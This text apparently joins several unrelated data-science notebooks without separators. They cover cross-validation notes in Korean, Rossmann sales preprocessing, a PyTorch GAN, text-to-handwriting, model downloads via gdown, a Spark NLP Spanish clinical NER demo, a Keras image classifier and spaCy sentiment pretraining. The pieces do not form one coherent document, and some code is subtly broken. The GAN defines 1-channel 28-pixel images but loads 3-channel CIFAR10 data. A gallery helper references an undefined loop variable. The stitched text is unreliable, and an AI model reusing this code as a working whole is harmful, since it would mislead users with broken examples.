결과의 분산이 높을 수 있음2. LOOCV (Leave-one-out Cross-validation) - fold 하나에 샘플 하나만 들어있는 K겹 교차 검증 - K를 전체 숫자로 설정하여 각 관측치가 데이터 세트에서 제외될 수 있도록 함 - 데이터셋이 클 때는 시간이 매우 오래 걸리지만, 작은 데이터셋에서는 좋은 결과를 만들어 냄 - 장점 : Data set에서 낭비 Data 없음 - 단점 : 측정 및 평가 고비용 소요 3. Stratified K-fold Cross-validation - 정답값이 모든 fold에서 대략 동일하도록 선택됨 - 각 fold가 전체를 잘 대표할 수 있도록 데이터를 재배열하는 프로세스 Kfoldfrom sklearn.model_selection import KFold kfold = KFold(n_splits = 10) # 교차검증 방법 설정 from sklearn.model_selection import cross_val_score # cross_val_score(모델, X , y , 사용할 교차검증 방법) cross_val_score(dt_clf, iris.data, iris.target, cv=kfold)StratifiedKFoldfrom sklearn.model_selection import StratifiedKFold skfold = StratifiedKFold(n_splits = 5, shuffle=False) #교차검증 방법 설정 # cross_val_score(모델, X , y , 사용할 교차검증 방법) cross_val_score(dt_clf, X, y, cv=skfold # 나눌 덩어리 횟수 )LeaveOnOutfrom sklearn.model_selection import LeaveOneOut leavefold = LeaveOneOut() #교차검증 방법 설정 cross_val_score(dt_clf, iris.data, iris.target, cv=leavefold # 나눌 덩어리 횟수 ) cross_val_score(dt_clf, iris.data, iris.target, cv=leavefold # 나눌 덩어리 횟수 ).mean()0.0. IMPORTSimport pandas as pd import inflection import math import matplotlib.pyplot as plt import seaborn as sns import numpy as np0.1. Helper Functions 0.2. 
Loading Datadf_sales_raw = pd.read_csv('dataset/train.csv', low_memory = False) df_store_raw = pd.read_csv('dataset/store.csv', low_memory = False) #merge df_raw = pd.merge(df_sales_raw, df_store_raw, how = 'left', on = 'Store')1.0. DATA DESCRIPTIONdf1 = df_raw.copy()1.1. Rename Columnscols_old = ['Store', 'DayOfWeek', 'Date', 'Sales', 'Customers', 'Open', 'Promo', 'StateHoliday', 'SchoolHoliday', 'StoreType', 'Assortment', 'CompetitionDistance', 'CompetitionOpenSinceMonth', 'CompetitionOpenSinceYear', 'Promo2', 'Promo2SinceWeek', 'Promo2SinceYear', 'PromoInterval'] snakecase = lambda x: inflection.underscore(x) cols_new = list(map(snakecase, cols_old)) #rename df1.columns = cols_new1.2. Data Dimensionsprint('Number of Rows: {}'.format(df1.shape[0])) print('Number of Columns: {}'.format(df1.shape[1]))Number of Rows: 1017209 Number of Columns: 181.3. Data Typesdf1['date'] = pd.to_datetime(df1['date']) df1.dtypes1.4. Check NAdf1.isna().sum()1.5. Fillout NAdf1['competition_distance'].max() #competition_distance df1['competition_distance'] = df1['competition_distance'].apply(lambda x: 200000.0 if math.isnan(x) else x) #competition_open_since_month df1['competition_open_since_month'] = df1.apply(lambda x: x['date'].month if math.isnan(x['competition_open_since_month']) else x['competition_open_since_month'], axis =1) #competition_open_since_year df1['competition_open_since_year'] = df1.apply(lambda x: x['date'].year if math.isnan(x['competition_open_since_year']) else x['competition_open_since_year'], axis = 1) #promo2_since_week df1['promo2_since_week'] = df1.apply(lambda x: x['date'].week if math.isnan(x['promo2_since_week']) else x['promo2_since_week'], axis =1) #promo2_since_year df1['promo2_since_year'] = df1.apply(lambda x: x['date'].year if math.isnan(x['promo2_since_year']) else x['promo2_since_year'], axis =1) #promo_interval month_map = {1: 'Jan',2: 'Feb',3: 'Mar',4: 'Apr',5: 'May',6: 'Jun',7: 'Jul',8: 'Aug',9: 'Sept',10: 'Oct',11: 'Nov',12: 'Dec',} df1['promo_interval'].fillna(0, inplace = True) df1['month_map'] = df1['date'].dt.month.map(month_map) df1['is_promo'] = df1[['promo_interval','month_map']].apply( lambda x: 0 if x['promo_interval'] == 0 else 1 if x['month_map'] in x['promo_interval'].split(',') else 0, axis = 1) df1.sample(5).T df1.isna().sum()1.6. Change Typedf1['competition_open_since_month'] = df1['competition_open_since_month'].astype( int ) df1['competition_open_since_year'] = df1['competition_open_since_year'].astype( int ) df1['promo2_since_week'] = df1['promo2_since_week'].astype( int ) df1['promo2_since_year'] = df1['promo2_since_year'].astype( int )1.7. 
Descriptive Statisticalnum_attributes = df1.select_dtypes( include = ('int64','float64') ) cat_attributes = df1.select_dtypes( exclude = ('int64','float64', 'datetime64[ns]') )1.7.1 Numerical Attributes# Central Tendency: mean, median ct1 = pd.DataFrame(num_attributes.apply( np.mean ) ).T ct2 = pd.DataFrame(num_attributes.apply( np.median ) ).T #Dispersion: std, min, max, range, skew, kurtosis d1 = pd.DataFrame( num_attributes.apply( np.std) ).T d2 = pd.DataFrame( num_attributes.apply( min ) ).T d3 = pd.DataFrame( num_attributes.apply( max ) ).T d4 = pd.DataFrame( num_attributes.apply( lambda x: x.max() -x.min() ) ).T d5 = pd.DataFrame( num_attributes.apply( lambda x: x.skew() ) ).T d6 = pd.DataFrame( num_attributes.apply( lambda x: x.kurtosis() ) ).T #Concatenate m = pd.concat( [d2, d3, d4, ct1, ct2, d1, d5, d6]).T.reset_index() m.columns = ['attributes','min','max','range','mean','median','std','skew','kurtosis'] m sns.displot(df1['competition_distance'])1.7.2 Categorical Attributescat_attributes.apply( lambda x: x.unique().shape ).T aux1 = df1[(df1['state_holiday']!= '0') & ( df1['sales'] > 0)] plt.subplot (1,3,1) sns.boxplot( x= 'state_holiday',y= 'sales', data= aux1) plt.subplot (1,3,2) sns.boxplot( x= 'store_type',y= 'sales', data= aux1) plt.subplot (1,3,3) sns.boxplot( x= 'assortment',y= 'sales', data= aux1)[View in Colaboratory](https://colab.research.google.com/github/miguelrq/GANs/blob/master/prueba.ipynb)import torch.nn as nn import torch !pip install --no-cache-dir -I pillow import argparse import os import numpy as np import math import torchvision.transforms as transforms from torchvision.utils import save_image from torch.utils.data import DataLoader from torchvision import datasets from torch.autograd import Variable import torch.nn as nn import torch.nn.functional as F import torch os.makedirs('images', exist_ok=True) n_epochs = 20 batch_size = 64 lr = 0.0002 b1 = 0.5 b2 = 0.999 n_cpu = 8 latent_dim = 100 img_size = 28 channels = 1 sample_interval = 800 img_shape = (channels, img_size, img_size) cuda = True if torch.cuda.is_available() else False class Generator(nn.Module): def __init__(self): super(Generator, self).__init__() def block(in_feat, out_feat, normalize=True): layers = [nn.Linear(in_feat, out_feat)] if normalize: layers.append(nn.BatchNorm1d(out_feat, 0.8)) layers.append(nn.LeakyReLU(0.2, inplace=True)) return layers self.model = nn.Sequential( *block(latent_dim, 128, normalize=False), *block(128, 256), *block(256, 512), *block(512, 1024), nn.Linear(1024, int(np.prod(img_shape))), nn.Tanh() ) def forward(self, z): img = self.model(z) img = img.view(img.size(0), *img_shape) return img class Discriminator(nn.Module): def __init__(self): super(Discriminator, self).__init__() self.model = nn.Sequential( nn.Linear(int(np.prod(img_shape)), 512), nn.LeakyReLU(0.2, inplace=True), nn.Linear(512, 256), nn.LeakyReLU(0.2, inplace=True), nn.Linear(256, 1), nn.Sigmoid() ) def forward(self, img): img_flat = img.view(img.size(0), -1) validity = self.model(img_flat) return validity # Loss function adversarial_loss = torch.nn.BCELoss() # Initialize generator and discriminator generator = Generator() discriminator = Discriminator() if cuda: generator.cuda() discriminator.cuda() adversarial_loss.cuda() # Configure data loader os.makedirs('../../data/CIFAR10', exist_ok=True) dataloader = torch.utils.data.DataLoader( datasets.CIFAR10('../../data/CIFAR10', train=True, download=True, transform=transforms.Compose([ transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 
0.5)) ])), batch_size=batch_size, shuffle=True) # Optimizers optimizer_G = torch.optim.Adam(generator.parameters(), lr=lr, betas=(b1, b2)) optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=lr, betas=(b1, b2)) Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor # ---------- # Training # ---------- for epoch in range(n_epochs): for i, (imgs, _) in enumerate(dataloader): # Adversarial ground truths valid = Variable(Tensor(imgs.size(0), 1).fill_(1.0), requires_grad=False) fake = Variable(Tensor(imgs.size(0), 1).fill_(0.0), requires_grad=False) # Configure input real_imgs = Variable(imgs.type(Tensor)) # ----------------- # Train Generator # ----------------- optimizer_G.zero_grad() # Sample noise as generator input z = Variable(Tensor(np.random.normal(0, 1, (imgs.shape[0], latent_dim)))) # Generate a batch of images gen_imgs = generator(z) # Loss measures generator's ability to fool the discriminator g_loss = adversarial_loss(discriminator(gen_imgs), valid) g_loss.backward() optimizer_G.step() # --------------------- # Train Discriminator # --------------------- optimizer_D.zero_grad() # Measure discriminator's ability to classify real from generated samples real_loss = adversarial_loss(discriminator(real_imgs), valid) fake_loss = adversarial_loss(discriminator(gen_imgs.detach()), fake) d_loss = (real_loss + fake_loss) / 2 d_loss.backward() optimizer_D.step() if n_epochs%100==0: print ("[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [G loss: %f]" % (epoch, n_epochs, i, len(dataloader), d_loss.data[0], g_loss.data[0])) batches_done = epoch * len(dataloader) + i if batches_done % sample_interval == 0: save_image(gen_imgs.data[:25], 'images/%d.png' % batches_done, nrow=5, normalize=True) !ls from PIL import Image import glob image_list = [] for filename in glob.glob('images/*.png'): #assuming gif im=Image.open(filename) image_list.append(im) import numpy as np import matplotlib.pyplot as plt def gallery(array, ncols=9): nindex, height, width, intensity = array.shape nrows = nindex//ncols assert nindex == nrows*ncols # want result.shape = (height*nrows, width*ncols, intensity) result = (array.reshape(nrows, ncols, height, width, intensity) .swapaxes(1,2) .reshape(height*nrows, width*ncols, intensity)) return result def make_array(): return np.array([np.array(img) for imf in image_list]) array = make_array() result = gallery(array) plt.figure(figsize=(13,20)) plt.imshow(result) plt.show() !ls ../../data/Fashionmnist/raw/Text to Handwriting using PythonTo convert text to handwriting, there is a library known as **PyWhatKit** in Python. It provides a lot of useful features, one can explore them [here](https://pypi.org/project/pywhatkit/).>To Install PyWhatKit, Run the following command in Terminal or Command prompt:>`pip install pywhatkit`In the code below, I first imported the pywhatkit and OpenCV libraries in Python. Here pywhatkit is used to convert text to handwritten text and OpenCV is used to visualize the image in which we are writing handwritten text.!pip install pywhatkit import pywhatkit as kit import cv2 kit.text_to_handwriting("Hello, Welcome to Text to Handwriting Program.", save_to="handwriting.png") img = cv2.imread("handwriting.png") cv2.imshow("Text to Handwriting", img) cv2.waitKey(0) cv2.destroyAllWindows()Download ModelsVGG19, ResNet50, and Xception models have been trained for view classification and can be downloaded using 'gdown' to your local directory. 
If necessary, use pip to install gdown.!pip install gdown import gdown import os # make models directory if necessary if not os.path.isdir('../models/'): os.mkdir('../models/') # download ResNet50 url = 'https://drive.google.com/u/0/uc?id=1PNTthLKk4qtpS3qedQPsJrQKev5x875n&export=download' output = '../models/ResNet50/' if not os.path.isdir(output): os.mkdir(output) gdown.download(url, os.path.join(output, 'resnet50.h5py'), quiet=False) # download VGG19 url = 'https://drive.google.com/u/0/uc?id=1Dmxs6Xpx9yBJA5R4W_tOvY4l0Y2YiEAN&export=download' output = '../models/VGG19/' if not os.path.isdir(output): os.mkdir(output) gdown.download(url, os.path.join(output, 'vgg19.h5py'), quiet=False) # download Xception url = 'https://drive.google.com/u/0/uc?id=19H8faj-jtvNmlhuIxQEOFGdFez4ku8xv&export=download' output = '../models/Xception/' if not os.path.isdir(output): os.mkdir(output) gdown.download(url, os.path.join(output, 'xception.h5py'), quiet=False)Downloading... From: https://drive.google.com/u/0/uc?id=1PNTthLKk4qtpS3qedQPsJrQKev5x875n&export=download To: E:\CAP\CAP-Automation\models\ResNet50\resnet50.h5py 190MB [03:08, 1.01MB/s] Downloading... From: https://drive.google.com/u/0/uc?id=1Dmxs6Xpx9yBJA5R4W_tOvY4l0Y2YiEAN&export=download To: E:\CAP\CAP-Automation\models\VGG19\vgg19.h5py 173MB [02:57, 972kB/s] Downloading... From: https://drive.google.com/u/0/uc?id=19H8faj-jtvNmlhuIxQEOFGdFez4ku8xv&export=download To: E:\CAP\CAP-Automation\models\Xception\xception.h5py 167MB [03:23, 821kB/s]![JohnSnowLabs](https://nlp.johnsnowlabs.com/assets/images/logo.png)[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/JohnSnowLabs/spark-nlp-workshop/blob/master/tutorials/streamlit_notebooks/healthcare/NER_DIAG_PROC.ipynb) **Detect Diagnoses and Procedures in Spanish** To run this yourself, you will need to upload your license keys to the notebook. Just Run The Cell Below in order to do that. Also You can open the file explorer on the left side of the screen and upload `license_keys.json` to the folder that opens.Otherwise, you can look at the example outputs at the bottom of the notebook. 1. Colab Setup Import license keysimport json import os from google.colab import files license_keys = files.upload() with open(list(license_keys.keys())[0]) as f: license_keys = json.load(f) # Defining license key-value pairs as local variables locals().update(license_keys) # Adding license key-value pairs to environment variables os.environ.update(license_keys)Install dependencies# Installing pyspark and spark-nlp ! pip install --upgrade -q pyspark==3.1.2 spark-nlp==$PUBLIC_VERSION # Installing Spark NLP Healthcare ! pip install --upgrade -q spark-nlp-jsl==$JSL_VERSION --extra-index-url https://pypi.johnsnowlabs.com/$SECRET # Installing Spark NLP Display Library for visualization ! pip install -q spark-nlp-displayImport dependencies into Python and start the Spark sessionimport pandas as pd from pyspark.ml import Pipeline from pyspark.sql import SparkSession import pyspark.sql.functions as F import sparknlp from sparknlp.annotator import * from sparknlp_jsl.annotator import * from sparknlp.base import * import sparknlp_jsl spark = sparknlp_jsl.start(license_keys['SECRET']) # manually start session # params = {"spark.driver.memory" : "16G", # "spark.kryoserializer.buffer.max" : "2000M", # "spark.driver.maxResultSize" : "2000M"} # spark = sparknlp_jsl.start(license_keys['SECRET'],params=params)2. 
Construct the pipeline Create the pipelinedocument_assembler = DocumentAssembler() \ .setInputCol('text')\ .setOutputCol('document') sentence_detector = SentenceDetector() \ .setInputCols(['document'])\ .setOutputCol('sentence') tokenizer = Tokenizer()\ .setInputCols(['sentence']) \ .setOutputCol('token') word_embeddings = WordEmbeddingsModel.pretrained("embeddings_scielowiki_300d","es","clinical/models")\ .setInputCols(["document","token"])\ .setOutputCol("word_embeddings") clinical_ner = MedicalNerModel.pretrained("ner_diag_proc","es","clinical/models")\ .setInputCols("sentence","token","word_embeddings")\ .setOutputCol("ner") ner_converter = NerConverter()\ .setInputCols(['sentence', 'token', 'ner']) \ .setOutputCol('ner_chunk') nlp_pipeline = Pipeline(stages=[ document_assembler, sentence_detector, tokenizer, word_embeddings, clinical_ner, ner_converter])embeddings_scielowiki_300d download started this may take some time. Approximate size to download 351.2 MB [OK!] ner_diag_proc download started this may take some time. Approximate size to download 14.2 MB [OK!]3. Create example inputs# Enter examples as strings in this array input_list = [ """En el último año, el paciente ha sido sometido a una apendicectomía por apendicitis aguda , una artroplastia total de cadera izquierda por artrosis, un cambio de lente refractiva por catarata del ojo izquierdo y actualmente está programada una tomografía computarizada de abdomen y pelvis con contraste intravenoso para descartar la sospecha de cáncer de colon. Tiene antecedentes familiares de cáncer colorrectal, su padre tuvo cáncer de colon ascendente (hemicolectomía derecha).""" ]4. Use the pipeline to create outputsempty_df = spark.createDataFrame([['']]).toDF('text') pipeline_model = nlp_pipeline.fit(empty_df) df = spark.createDataFrame(pd.DataFrame({'text': input_list})) result = pipeline_model.transform(df)5. Visualize resultsfrom sparknlp_display import NerVisualizer NerVisualizer().display( result = result.collect()[0], label_col = 'ner_chunk', document_col = 'document' )Visualize outputs as data frameexploded = F.explode(F.arrays_zip('ner_chunk.result', 'ner_chunk.metadata')) select_expression_0 = F.expr("cols['0']").alias("chunk") select_expression_1 = F.expr("cols['1']['entity']").alias("ner_label") result.select(exploded.alias("cols")) \ .select(select_expression_0, select_expression_1).show(truncate=False) result = result.toPandas()+--------------------------------------------+-------------+ |chunk |ner_label | +--------------------------------------------+-------------+ |apendicitis aguda |DIAGNOSTICO | |artroplastia total de cadera izquierda |PROCEDIMIENTO| |artrosis |DIAGNOSTICO | |catarata del ojo izquierdo |DIAGNOSTICO | |tomografía computarizada de abdomen y pelvis|PROCEDIMIENTO| |cáncer de colon |DIAGNOSTICO | |cáncer colorrectal |DIAGNOSTICO | |cáncer de colon ascendente |DIAGNOSTICO | |hemicolectomía derecha |PROCEDIMIENTO| +--------------------------------------------+-------------+Load constanteswith open("config.yaml",'r') as config_file: config = yaml.safe_load(config_file) IMAGE_WIDTH = config["image_width"] IMAGE_HEIGHT = config["image_height"] IMAGE_DEPTH = config["image_depth"] DATA_DIR= pathlib.Path(config["data_dir"]) MODELS_DIR = pathlib.Path(config["models_dir"]) TARGET_NAME= config["target_name"] DATA_TRAIN_FILE= config["data_train_file"] DATA_TEST_FILE= config["data_test_file"]Functionsdef build_image_database(path,target): """ Build a pandas dataframe with target class and access path to images. 
Parameters: - path (Path): Path pattern to read csv file containing images information - target(str): The second column to extract from the file Return: A pandas dataframe, ------- """ #Load file _df= pd.read_csv(path, names=["all"], ) #Recover data _df["image_id"]=_df["all"].apply(lambda x: x.split(' ')[0]) _df[target]=_df["all"].apply(lambda x: ' '.join(x.split(' ')[1:])) _df[target].unique() #Create path _df["path"]= _df['image_id'].apply( lambda x: DATA_DIR/"images"/(x+'.jpg')) return _df.drop(columns=["all"]) def build_classification_model(df: pd.DataFrame,target: str, images: str): """Build a tensorflow model using information from target and images columns in dataframes Parameters ---------- df (pandas.dataFrame): dataframe with target and images columns target (str): column name for target variable images (str): column name for images Returns ------ tensorflow model built & compiled """ #Compute number of classes for output layer nb_classes = df[target].nunique() # Computer images size for input layer size = df[images].iloc[0].shape # Building the model model = Sequential() model.add(Conv2D(filters=32, kernel_size=(5,5), activation='relu', input_shape=size)) model.add(Conv2D(filters=32, kernel_size=(5,5), activation='relu')) model.add(MaxPool2D(pool_size=(2, 2))) model.add(Dropout(rate=0.25)) model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu')) model.add(Conv2D(filters=64, kernel_size=(3, 3), activation='relu')) model.add(MaxPool2D(pool_size=(2, 2))) model.add(Dropout(rate=0.25)) model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(rate=0.5)) model.add(Dense(nb_classes , activation='softmax')) #Compilation of the model model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy']) #output layer of nb_classes return model def show_image(df,row,target): """show the image in the ligne row and the associated target column Args: df (pandas.dataFrame): the dataframe of images row (int): the index of the row target (string): the column name of the associated label Return ------ None """ assert target in df.columns, f"Column {target} not found in dataframe" assert 'path' in df.columns, f"Column path doens't not exit in dataframe" _img = plt.imread(df.loc[row,'path']) plt.imshow(_img) return def load_resize_image(path,height,width): """Load an image and resize it to the target size Parameters: - path (Path): path to the file to load and resize - height (int): the height of the final resized image - width(int): the width of the resized image Return ------ numpy.array containing resized image """ return np.array(Image.open(path).resize((width,height))) def build_x_and_y(df: pd.DataFrame, target: str, images: str): """build x tensor and y tensor for model fitting. parameters ---------- df(pd.DataFrame): dataframe target(str): name of target column images (str): name of resized images column Returns ------- x (numpy.array): tensor of x values y (numpy.array): tensor of y values """ x= np.array(df[images].to_list()) y=tf.keras.utils.to_categorical(df[target].astype('category').cat.codes) return x,y def classify_images(images,model,classes_names=None): """Classify images through a tensorflow model. 
Parameters: ----------- images(np.array): set of images to classify model (tensorflow.keras.Model): tensorflow/keras model Returns ------- predicted classes """ results = model.predict(images) classes = np.argmax(results,axis=1) if classes_names is not None: classes = np.array(classes_names[classes]) return classes def save_model(model ,saving_dir=MODELS_DIR,basename=TARGET_NAME,append_time=False): """Save tf/Keras model in saving_dir folder Parameters ---------- model (tf/Keras model): model to be saved saving_dir (path): location to save model file basename (str): the basename of the model append_time (bool): indicate if the time will be append to the basename """ model_name = f"{basename}{'_' + datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S') if append_time else ''}" model.save(f"{saving_dir}/neural_networks/{model_name}.h5") return model_nameRead train & test filetrain_df = build_image_database(DATA_DIR/DATA_TRAIN_FILE,TARGET_NAME) test_df = build_image_database(DATA_DIR/DATA_TEST_FILE,TARGET_NAME) # Previous the dataframe train_df.head() test_df.head()View some imagesshow_image(train_df, np.random.randint(0,train_df.shape[0]), TARGET_NAME) show_image(test_df,np.random.randint(0,test_df.shape[0]),TARGET_NAME)Resize Images#Resize train images train_df['resized_image'] = train_df.apply( lambda r: load_resize_image(r['path'],IMAGE_HEIGHT,IMAGE_WIDTH), axis=1) #Resize test images test_df['resized_image'] = test_df.apply( lambda r: load_resize_image(r['path'],IMAGE_HEIGHT,IMAGE_WIDTH), axis=1)Split dataset into x and yX_train,y_train = build_x_and_y(train_df,TARGET_NAME,'resized_image') X_test,y_test = build_x_and_y(test_df,TARGET_NAME,'resized_image')Build & train the modelmodel = build_classification_model(train_df,TARGET_NAME,"resized_image") %load_ext tensorboard !rm -rf ./logs log_dir = "logs/fit/" + datetime.datetime.now().strftime("%Y%m%d-%H%M%S") tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1) %%time epochs = 5 history = model.fit(X_train,y_train,batch_size = 32,epochs = epochs , validation_data = (X_test,y_test), callbacks=[tensorboard_callback] ) %tensorboard --logdir logs/fitPredict from the modelclasses_names = train_df[TARGET_NAME].astype('category').cat.categories classify_images(X_test[10:20],model,classes_names)Save the modelmodel_name = save_model(model,MODELS_DIR) with open(MODELS_DIR/"classes"/f"{model_name}.yaml","w") as classe_file: yaml.dump(list(classes_names),classe_file)"Mother's day Sentiment analysis - with spaCy"> "In this notebook I try to use a competition dataset of tweets reacting to Mother's day and classify their sentiments with spaCy"- toc: true- branch: master- badges: true- comments: true- categories: [nlp, eda, sentiment]- hide: false#hide import requests zip_file = requests.get('https://he-s3.s3.amazonaws.com/media/hackathon/hackerearth-test-draft-1-102/predicting-tweet-sentiments-231101b4/fa62f5d69a9f11ea.zip?Signature=2yxQgjub3w4jc%2BhnFKq0GEwmNEE%3D&Expires=1590825609&AWSAccessKeyId=') with open('data.zip', 'wb') as f: f.write(zip_file.content) #hide !cp /content/drive/My\ Drive/Data/tweets_mother_day.zip ./data.zip !unzip data.zipArchive: data.zip creating: dataset/ inflating: dataset/train.csv inflating: dataset/test.csvSetup paths We will use the method from my previous [post](https://mani2106.github.io/Blog-Posts/nlp/eda/sentiment/2020/05/23/_Hackerearth_mothers_day_sentiment.html) to clean the text.from pathlib import Path import pandas as pd DATA_PATH = Path('dataset/') DRIVE_PATH = 
Path(r"/content/drive/My Drive/Spacy/Pretrained") train_data = pd.read_csv(DATA_PATH/'train.csv', index_col=0) train_data.head()Let's check average length of text before cleaning.#collapse print(sum( train_data['original_text'].apply(len).tolist() )/train_data.shape[0])227.42102009273572Clean links with regextrain_data['original_text'].replace( # Regex is match : the text to replace with {'(https?:\/\/.*|pic.*)[\r\n]*' : ''}, regex=True, inplace=True)Let's check the average length again.#hide print(sum( train_data['original_text'].apply(len).tolist() )/train_data.shape[0])185.95672333848532The regex did it's job I suppose.train_data.head()In my previous exploratory [post](https://mani2106.github.io/Blog-Posts/nlp/eda/sentiment/2020/05/23/_Hackerearth_mothers_day_sentiment.html), I have seen the data and I think that the features other than the text may not be required, (ie)- lang- retweet_count- original_author Class distribution - `0` must mean `Neutral`- `1` means `Positive`- `-1` means `Negative`train_data['sentiment_class'].value_counts().plot(kind='bar')Let's see some sentences with negative examples, I am interested why they should be negative on a happy day(Mother's day)list_of_neg_sents = train_data.loc[train_data['sentiment_class'] == -1, 'original_text'].tolist() #collapse pprint(list_of_neg_sents[:5])['Happy mothers day To all This doing a mothers days work. Today been quiet ' 'but Had time to reflect. Dog walk, finish a jigsaw do the garden, learn few ' 'more guitar chords, drunk some strawberry gin and tonic and watch Lee evens ' 'on DVD. My favourite place to visit. #isolate ', 'Remembering the 3 most amazing ladies who made me who I am! My late ' 'grandmother iris, mum carol and great grandmother Ethel. Missed but never ' 'forgotten! Happy mothers day to all those great mums out there! Love sent to ' 'all xxxx ', 'Happy Mothers Day to everyone tuning in. This is the 4th Round game between ' 'me and @CastigersJ Live coverage on @Twitter , maybe one day @SkySportsRL or ' 'on the OurLeague app', "Happy Mothers Day ! We hope your mums aren't planning to do any work around " 'the house today! Surely it can wait until next week? #plumbers ' '#heatingspecialists #mothersday #mothersday ', "Happy mothers day to all those mums whos children can't be with them today. " 'My[...]Well some tweets actually express their feelings for their deceased mothers. This is understandable. We can use traditional NLP methods or deep learning methods to model the text. We will try the deep learning in this notebook . Deep Learning approach with Spacy It's recommended [here](https://spacy.io/usage/trainingtransfer-learning) that to improve performance of the classifier, **Language model pretraining** is one way to do so. Spacy requires a `.jsonl` format of input to train text Get texts from the dataframe and store in `jsonl` format more about that [here](https://spacy.io/api/clipretrain-jsonl). 
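Each line of that file is simply a standalone JSON object carrying the raw tweet under a `text` key, roughly like this (the two lines below are purely illustrative, not taken from the dataset):
{"text": "Happy Mothers Day to all the amazing mums out there!"}
{"text": "Spending the day with my mum, feeling grateful."}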
We can also load the test data to get some more sample for the `pretraining`, this will not cause **Data Leakage** because we are not giving any labels to the model.test_data = pd.read_csv(DATA_PATH/'test.csv', index_col=0) test_data.head()Let's clean the test set for links as welltest_data['original_text'].replace( # Regex pattern to match : the text to replace with {'(https?:\/\/.*|pic.*)[\r\n]*' : ''}, regex=True, inplace=True) test_data.shape texts_series = pd.concat([train_data['original_text'], test_data['original_text']], axis='rows')Let's check the lengthtexts_series.shape[0], train_data.shape[0]+test_data.shape[0]So now we can use this `texts_series` to create the `jsonl` file.list_of_texts = [ # Form dictionary with 'text' key {'text': value} for _, value in texts_series.items() ]I will use `srsly` to write this list of dictionaries to a `jsonl` fileimport srsly # saving to my Google drive srsly.write_jsonl(DRIVE_PATH/'pretrain_texts.jsonl', list_of_texts)We can see a few lines from the saved file.#collapse from pprint import pprint with Path(DRIVE_PATH/'pretrain_texts.jsonl').open() as f: lines = [next(f) for x in range(5)] pprint(lines)['{"text":"Happy #MothersDay to all you amazing mothers out there! I know ' "it's hard not being able to see your mothers today but it's on all of us to " 'do what we can to protect the most vulnerable members of our society. ' '#BeatCoronaVirus "}\n', '{"text":"Happy Mothers Day Mum - I\'m sorry I can\'t be there to bring you ' "Mothers day flowers & a cwtch - honestly at this point I'd walk on hot coals " "to be able to. But I'll be there with bells on as soon as I can be. Love you " 'lots xxx (p.s we need more photos!) "}\n', '{"text":"Happy mothers day To all This doing a mothers days work. Today been ' 'quiet but Had time to reflect. Dog walk, finish a jigsaw do the garden, ' 'learn few more guitar chords, drunk some strawberry gin and tonic and watch ' 'Lee evens on DVD. My favourite place to visit. #isolate "}\n', '{"text":"Happy mothers day to this beautiful woman...royalty soothes you ' 'mummy jeremy and emerald and more #PrayForRoksie #UltimateLoveNG "}\n', '{"t[...]Start Pretraining We should download a pretrained to model to use, Here I am using _en_core_web_md_ from `Spacy`. This can be confusing (ie) Why should I train a pretrained model, if I can download one, The idea is that the downloaded pretrained model would have been trained with a **very different** type of dataset, but it already has some knowledge on interpreting words in English sentences. But here we have dataset of tweets which the downloaded pretrained model may or may not have seen during it's training, So we use our dataset to **fine-tune** the downloaded model, so that with minimum training it can start understanding the tweets right away.#collapse !python -m spacy download en_core_web_mdTraining results#collapse %%bash # Command to pretrain a language model # Path to jsonl file with data # Using md model as the base # saving the model on my Drive folder # training for 50 iterations with seed set to 0 python -m spacy pretrain /content/drive/My\ Drive/Spacy/Pretrained/pretrain_texts.jsonl \ /usr/local/lib/python3.6/dist-packages/en_core_web_md/en_core_web_md-2.2.5 \ /content/drive/My\ Drive/Spacy/Pretrained/ \ -i 50 -s 0 \ℹ Not using GPU ⚠ Output directory is not empty It is better to use an empty directory or refer to a new output path, then the new directory will be created for you. ✔ Saved settings to config.json ⠙ Loading input texts... 
✔ Loaded input texts ⠙ Loading model '/usr/local/lib/python3.6/dist-packages/en_core_web_md/en_core_web_md-2.2.5'... ⠹ Loading model '/usr/local/lib/python3.6/dist-packages/en_core_web_md/en_core_web_md-2.2.5'... ⠸ Loading model '/usr/local/lib/python3.6/dist-packages/en_core_web_md/en_core_web_md-2.2.5'... ⠼ Loading model '/usr/local/lib/python3.6/dist-packages/en_core_web_md/en_core_web_md-2.2.5'... ⠴ Loading model '/usr/local/lib/python3.6/dist-packages/en_core_web_md/en_core_web_md-2.2.5'... ⠦ Loading model '/usr/local/lib/python3.6/dist-packages/en_core_web_md/en_core_web_md-2.2.5'... ⠧ Loading model '/usr/local/lib/python3.6/dist-packages/en_core_web_md/en_core_web_md-2.2.5'... ⠇ Loading model '/usr/loca[...]I have chosen to use the default parameters however one might need to change them for their problem. We can see from the logs that the loss value in the last iteration is `18639`, but since the batch_size was `3000` our data must have splitted to `2` batches, (number of texts are `4622`) we should also take the previous log entry to account which is loss of `33658`, So the average of them would be `26148.5`, This number might be intimidating but the only way to check if it actually helps is to try to train a model with it. If it doesn't then we can resume the training from the model saved on the last epoch. We keep only the last model from the pretraining.#hide !mv /content/drive/My\ Drive/Spacy/Pretrained/model49.bin /content/drive/My\ Drive/Spacy/ !mv /content/drive/My\ Drive/Spacy/Pretrained/*.json* /content/drive/My\ Drive/Spacy/ #hide !rm /content/drive/My\ Drive/Spacy/Pretrained/*.bin #hide !mkdir /content/drive/My\ Drive/Spacy/Pretrained/fifty_iter !mv /content/drive/My\ Drive/Spacy/model49.bin /content/drive/My\ Drive/Spacy/Pretrained/fifty_iter !mv /content/drive/My\ Drive/Spacy/*g.json* /content/drive/My\ Drive/Spacy/Pretrained/fifty_iterLet's train a text classifier with `Spacy` Text classifier with Spacy Now that we have a pretrained model, We now need to prepare data for training the text classifier. Let's have a look at the [data format](https://spacy.io/usage/trainingtraining-simple-style) that Spacy expects the data to be in. Data Generation ```json{ "entities": [(0, 4, "ORG")], "heads": [1, 1, 1, 5, 5, 2, 7, 5], "deps": ["nsubj", "ROOT", "prt", "quantmod", "compound", "pobj", "det", "npadvmod"], "tags": ["PROPN", "VERB", "ADP", "SYM", "NUM", "NUM", "DET", "NOUN"], 